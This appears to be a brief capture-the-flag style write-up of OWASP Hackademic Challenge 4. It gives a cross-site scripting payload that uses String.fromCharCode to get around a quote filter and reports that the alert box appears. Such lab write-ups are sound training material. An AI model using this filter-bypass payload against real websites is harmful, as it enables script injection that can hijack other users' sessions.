8021 OWASP Hackademic Challenge 4
problem:
the challenge simulates the protection of disallowed quotes
attack:
enter
<script>alert(String.fromCharCode(88,83,83,33))</script>
result:
the alert box is shown (see 8021_2.png)
challenge is completed (see 8021_3.png)